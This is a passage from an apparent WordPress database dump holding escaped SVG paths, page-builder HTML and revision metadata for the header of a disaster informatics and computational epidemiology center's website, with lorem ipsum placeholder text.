d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n            <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:43:42','2022-02-16 15:43:42','',22,'https://gsudice.dataconn.net/?p=318',0,'revision','',0),(322,1,'2022-02-16 15:44:20','2022-02-16 15:44:20','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna 